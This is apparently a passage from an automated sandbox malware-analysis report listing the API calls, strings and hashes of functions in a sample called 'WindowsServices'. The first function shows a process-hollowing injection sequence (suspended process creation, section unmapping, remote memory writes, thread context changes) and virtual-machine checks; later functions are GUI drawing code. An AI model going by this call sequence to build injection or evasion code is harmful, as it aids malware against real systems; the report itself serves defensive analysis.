                                                                        • wcscpy.MSVCRT ref: 00407F8A
                                                                        • wcscat.MSVCRT ref: 00407F9E
                                                                        • wcscat.MSVCRT ref: 00408144
                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
                                                                        • Wow64GetThreadContext.KERNEL32 ref: 004081A2
                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 004081BE
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081E0
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081FF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 0040820D
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004082BF
                                                                        • VirtualAllocEx.KERNELBASE(?,-FFF00000,00100000,00003000,00000040,?,00003000,00000040), ref: 004082EE
                                                                        • WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,.dll,?,00000000,?,00003000,00000040), ref: 00408317
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00003000,00000040), ref: 00408353
                                                                        • WriteProcessMemory.KERNELBASE(?,0000002E,0000006B,?,00000000,?,00003000,00000040), ref: 004083C0
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,?,?,00003000,00000040), ref: 004083F5
                                                                        • Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
                                                                        • Wow64SuspendThread.KERNEL32(?,?,00003000,00000040), ref: 00408490
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 004084B5
                                                                        • wcscpy.MSVCRT ref: 00408760
                                                                        • wcscat.MSVCRT ref: 00408774
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040878D
                                                                        • CopyFileW.KERNELBASE(?,?,00000000), ref: 004087A3
                                                                        • ResumeThread.KERNELBASE(?), ref: 004087FC
                                                                        • Sleep.KERNELBASE(00000002), ref: 00408815
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
                                                                        • Module32First.KERNEL32(00000000,00000000), ref: 004088AC
                                                                        • strstr.MSVCRT ref: 004088D6
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 00408904
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040891F
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408926
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408930
                                                                        • ResumeThread.KERNELBASE(?), ref: 00408949
                                                                        • Sleep.KERNELBASE(00000002), ref: 0040894D
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408956
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040897B
                                                                        • Sleep.KERNELBASE(00000005), ref: 0040898A
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
                                                                        • wcscat.MSVCRT ref: 00408A5B
                                                                        • wcsstr.MSVCRT ref: 00408A82
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
                                                                        • TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00408C6D
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00408C8E
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408CAF
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408CE1
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00408DF1
                                                                        • strstr.MSVCRT ref: 00408E02
                                                                        • strstr.MSVCRT ref: 00408E16
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408E2E
                                                                        • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408FB8
                                                                        • CreateFileA.KERNELBASE(00000000,00000000,00000002,00000000,00000003,00000000,00000000), ref: 00408FDA
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409030
                                                                        • wcslen.MSVCRT ref: 00409045
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040906E
                                                                        • wcscat.MSVCRT ref: 004090E9
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409108
                                                                        • VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
                                                                        • ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004091BD
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
                                                                        • Sleep.KERNELBASE(00000320), ref: 004099F6
                                                                        • TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$File$Create$Process$Thread$Memory$Write$VirtualWow64wcscat$Alloc$ChangeCloseFindNotificationResumeSectionSleepSuspendUnmapViewwcscpy$strstr$AddressContextDeleteFirstMoveProcProcess32ReadSnapshotTerminateToolhelp32$CopyModuleModule32NameNextwcslenwcsstr
                                                                        • String ID: $ $ $ $ $ $ $ /c $"$"$"$"$"$"$"$"$",1$'$($)$.$.$.$.$.$.$.$.$.$.$.$.$.dll$/$/$/$0$0$0$2$2$2$2$2$2$2$2$2$2$4$5$5$7$7$<$<$<$<$<$=$>$>$>$>$>$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$Allocat$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$Clos$CopyFil$D$D$D$D$D$Dtl$Duplicat$E$E$E$E$E$E$E$E$E$EqualSid$ExitProc$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$I$I$I$I$IsWow64Proc$L$L$LookupAccountSidA$M$M$M$M$M$M$M$M$M$M$Modul$Modul$Mov$N$N$N$N$N$NtR$NtUnmapVi$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Proc$Proc$Program Fil$Q$Q$R$R$R$R$R$R$R$Rmr$RuV$RuV$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$Shdt$Sii$Sitbs$StcF$StcF$Susp$Sys$T$T$T$T$T$T$T$T$T$T$T$V$V$V$V$V$VBoxS$VirtualAlloc$VirtualAllocEx$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$Writ$Writ$\$\$\$\$\$\SD_$\cmd.$_$_$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$advapi$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$f$f$f$f$f$f$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$myapp.$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$psapi.dll$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z
                                                                        • API String ID: 1831195861-1627083277
                                                                        • Opcode ID: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction ID: 2c80d00dd46d1456f42e515657256ab332893eb39df263fc7d206d4ca39ac36b
                                                                        • Opcode Fuzzy Hash: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction Fuzzy Hash: 0993FE60D086E8D9EB22C768CC587DEBFB55F66304F0441D9D18C77282C6BA5B88CF66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 0040A2C8
                                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040A2D9
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A2F1
                                                                          • Part of subcall function 004052C0: CopyRect.USER32(?,004384C8), ref: 004052CD
                                                                        • _ftol.MSVCRT ref: 0040A30F
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A34B
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 00405316
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040A37F
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$Window$MessageSend$_ftol
                                                                        • String ID:
                                                                        • API String ID: 1452107452-0
                                                                        • Opcode ID: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction ID: 82604ac88615afb37d6d3c3cd9f472b3106c4a6f90d73964fe7bd466d50d877b
                                                                        • Opcode Fuzzy Hash: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction Fuzzy Hash: 85315E71204705AFD314DF25C885F6BB7E8FBC8B04F004A2DB585A32C1D678E8098B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 409 40b2a2-40b2b7 69CE4ED0
                                                                        APIs
                                                                        • 69CE4ED0.MFC42(0040B243,0040B243,0040B243,0040B243,0040B243,00000000,?,0000000A), ref: 0040B2B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction ID: 357b4c9800bdd651ee11a6a5109b4e9d846802b8a319b0e0d2e175bba6204330
                                                                        • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction Fuzzy Hash: 17B00836018386ABCB02DE91890592EBAA2BB99304F484C6DB2A5100A187668429BB56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • IsIconic.USER32(?), ref: 0040A464
                                                                        • SendMessageA.USER32(?,00000027,?,00000000), ref: 0040A49D
                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0040A4AB
                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0040A4B1
                                                                        • GetClientRect.USER32(?,?), ref: 0040A4BE
                                                                        • DrawIcon.USER32(?,?,?,?), ref: 0040A4F6
                                                                        • CreateCompatibleDC.GDI32(?), ref: 0040A5A2
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 0040A5BE
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040A5DF
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 0040A606
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 0040A622
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A66B
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreateMetricsRectSystem$BitmapClientDrawIconIconicMessageModeSendWindow
                                                                        • String ID:
                                                                        • API String ID: 291364621-0
                                                                        • Opcode ID: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction ID: 6d70c99ac97023b5f14d40c01a2117d862bf0d83ff31a6fcaea798b65c65e005
                                                                        • Opcode Fuzzy Hash: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction Fuzzy Hash: 5FA1F971108341DFC314DF69C985E6BB7E9EBC8704F008A2EF596A3290D774E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A56
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A7E
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B21
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B4C
                                                                          • Part of subcall function 004039C0: Polygon.GDI32(?,?,?), ref: 00403B9A
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ABE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ADE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404AFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol$Polygon
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 2518728319-821843137
                                                                        • Opcode ID: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction ID: 1b864ce688a3351c981eaee8f36bd257d0a296356b300086fb8b46b6cfa255b8
                                                                        • Opcode Fuzzy Hash: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction Fuzzy Hash: FAB1B1FA9A03007ED200F6619C82D6BBB6CDAF8B15F40DD0EB559610C3B9BCD304867A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00405316
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403F95
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403FBF
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040543E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040545E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040547E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040549E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040551E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040553E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040555E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040557E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040559E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040561E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040563E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040565E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040567E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040569E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040571E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040573E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040575E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$CreatePolygon$Combine_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 3890769595-821843137
                                                                        • Opcode ID: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction ID: 87a306119b05220822c14238118f6d845cb676b63f2a489d8e55d3df45724c17
                                                                        • Opcode Fuzzy Hash: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction Fuzzy Hash: 09B1B2FA9803003ED200F661DC82D6BBB6CD9F8B11F40DE0EB559610C6B97CDB1486BA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
